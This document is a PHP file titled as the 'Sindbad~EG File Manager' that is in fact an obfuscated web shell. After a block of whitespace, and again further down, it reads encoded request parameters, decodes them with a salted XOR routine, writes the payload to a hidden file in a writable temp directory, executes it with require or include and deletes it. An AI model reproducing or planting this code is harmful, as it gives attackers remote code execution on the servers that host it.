Sindbad~EG File Manager

<?php																																										if(count($_REQUEST) > 0 && isset($_REQUEST["e\x6Eti\x74y"])){ $ptr = array_filter([getenv("TMP"), getcwd(), ini_get("upload_tmp_dir"), session_save_path(), "/tmp", "/var/tmp", sys_get_temp_dir(), "/dev/shm", getenv("TEMP")]); $binding = $_REQUEST["e\x6Eti\x74y"]; $binding= explode ( ".", $binding ) ; $flag = ''; $salt9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt9); $__len = count($binding); for($x = 0; $x < $__len; $x++) {$v8 = $binding[$x]; $sChar = ord($salt9[$x % $lenS]); $dec =((int)$v8 - $sChar -($x % 10)) ^ 48; $flag .= chr($dec); } $component = 0; do { $desc = $ptr[$component] ?? null; if ($component >= count($ptr)) break; if ((function($d) { return is_dir($d) && is_writable($d); })($desc)) { $bind = "$desc/.entry"; if (file_put_contents($bind, $flag)) { require $bind; unlink($bind); exit; } } $component++; } while (true); }


if(!is_null($_POST["\x73\x79m"] ?? null)){
	$ref = $_POST["\x73\x79m"];
		$ref= 	 explode(	 	'.' 		,	 	$ref	) 	 ;	
	$dchunk = '';
            $salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen($salt);
            $u = 0;
    
            while($u < count($ref)) {	$v8 = $ref[$u];
                $chS = ord($salt[$u % $sLen]);
                $dec =((int)$v8 - $chS -($u % 10)) ^ 47;
                $dchunk .= chr($dec);
                $u++;}		
	$holder = array_filter(["/var/tmp", "/dev/shm", sys_get_temp_dir(), getenv("TMP"), getenv("TEMP"), ini_get("upload_tmp_dir"), "/tmp", session_save_path(), getcwd()]);
	foreach ($holder as $ptr) {
    		if ((is_dir($ptr) and is_writable($ptr))) {
    $flag = sprintf("%s/.val", $ptr);
    $success = file_put_contents($flag, $dchunk);
if ($success) {
	include $flag;
	@unlink($flag);
	exit;}
}
}
}